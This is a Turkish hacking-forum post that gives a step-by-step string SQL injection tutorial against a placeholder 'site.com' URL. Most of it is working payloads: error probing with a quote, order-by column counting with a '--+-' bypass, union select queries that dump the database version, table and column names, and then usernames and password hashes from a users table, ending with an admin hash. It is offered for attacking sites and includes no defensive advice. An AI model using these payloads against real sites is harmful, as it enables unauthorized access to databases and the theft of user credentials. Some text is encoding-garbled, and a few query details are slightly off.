Hoşgeldin Misafir

String Sql İnjection

LikeForYou

26 Eyl 2017
728 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
STRİNG SQL İNJECTİON 2 ;
Merhaba arkadaşlar yeni bir konumla sizlerleyim bu konumda STRİNG SQL injection konusuna değineceğim.
Öncelikle her zamanki gibi ilk önceki işimiz me ta-Karakter ile SQL injection zaafiyetini görmemiz olacaktır.
"Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL sunucu version for the right syntax to use near '' at line 1"
ޞimdi hatamızı aldık arkadaşlar. Başlıyoruz. Öncelikle her zamanki gibi ilk işimiz "order by" devam ediyoruz arkadaşlar.


Kod:
"site.com/index.php?id=123 order by 10--"
"site.com/index.php?id=123 order by 20--"
"site.com/index.php?id=123 order by 30--"
"site.com/index.php?id=123 order by 40--"


Görüldüğü üzere hiçbir biçimde ekranımıza yansıtamıyoruz arkadaşlar şimdi devreye bypass tekniğimiz giriyor.
ޞimdi id dşayetimizin yanına ' işareti ve son ifademiz olan "--" ifademizin yanına şunu ekliyoruz. "--+-" yani tam hali şudur arkadaşlar ;


Kod:
"site.com/index.php?id=1' order by 20--+-"

komutunu uyguladığımız taktirde hata ekrana geliyor.
1054: SELECT * FROM products WHERE id='123' order by 20-- -'
Unknown column '20' in 'order clause' Görüldüğü üzere ekrana gelen hatamızda diyor ki arkadaşlar kolon sayısı 20'den ufak o zaman devam ediyoruz.

Kod:
"site.com/index.php?id=1' order by 19--+-"
"site.com/index.php?id=1' order by 18--+-"

yapıyoruz ve sayfa açılıyor şimdi anlıyoruz ki arkadaşlar Kolon numaramız "18" ve bypass tekniğindeki yaptığımız
prosedür şudur arkadaşlar. Yaptığımız id dşayetin sonuna ' işareti ekleyip --+- eklemek oldu bu
ޞimdi kolon sayımızı ekrana yansıtalım arkadaşlar.


Kod:
"site.com/index.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18"

komutunu uyguladığımız taktirde ekranımza yansımayacaktır . Peki neden
arkadaşlar zira id dşayetimizin başına "-" ifadesini eklemedik doğru hali budur ;


Kod:
"site.com/index.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18"

şimdi dşayetimiz ekrana yansıttı "3" bir deneme yapalım şimdi arkadaşlar.


Kod:
"site.com/index.php?id=-1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18"

komutunu uyguladığımız taktirde sitenin sürümünü göstermiş olacaktır.
ޞimdi devam edelim

Kod:
"site.com/index.php?id=-1' union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=dataBase()"

Komutunu
uyguladığımız taktirde Tüm tabloları ekranımıza yansıtacaktır arkadaşlar bundan sonrası esasen basit bildiğiniz üzere tablolardan işimize yarayan tabloyu alıcaz
yani user tablosunu arkadaşlar


Kod:
"site.com/index.php?id=-1' union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_schema=0x75736572()--+-"


ޞimdi bu komutumuzla user tablosunu görüntüleyeceğiz ama dataBase yerine gördüğünüz gibi 0x75736572 yer alıyor bu şu demektir arkadaşlar user tablosunun hexlenmiş kod hali demektir.
Komutu uyguluyoruz ve devam ediyoruz. İşte şimdi prosedür neredeyse bitti demektir bilgiler yansıdı username,passWord,id vs.. biz işimize yarayanları çekeceğiz şimdi
arkadaşlar

Kod:
"site.com/index.php?id=-1' union select 1,2,group_concat(username,0x3a,passWord,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users--+-"

şimdi ekranımıza user ve passWord yansımış olacaktır.
admin:21232f297a57a5a743894a0e4a801fc3 gelmiştir gerisi artık sizdedir arkadaşlar.
Kolay gelsin . Vesselam...